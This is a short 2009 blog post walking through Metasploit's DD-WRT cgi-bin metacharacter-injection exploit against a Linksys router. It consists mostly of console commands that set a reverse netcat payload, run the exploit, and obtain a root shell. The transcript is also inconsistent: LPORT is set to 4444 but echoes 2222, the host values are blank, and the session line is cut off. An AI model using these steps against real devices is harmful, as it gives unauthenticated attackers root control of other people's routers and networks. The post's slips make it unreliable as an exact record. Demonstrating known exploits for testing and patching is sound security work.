Sunday, 26 July 2009

Expoliting the cgi-bin vulnerability in dd-wrt

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. In this example we are attacking from the LAN side of a Linksys WRT54GS running dd-wrt V24-SP1 using factory default settings.

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST
msf exploit(ddwrt_cgibin_exec) > set LHOST
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened ( ->
uname -a
Linux DD-WRTx86CI #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown

No comments:

Post a Comment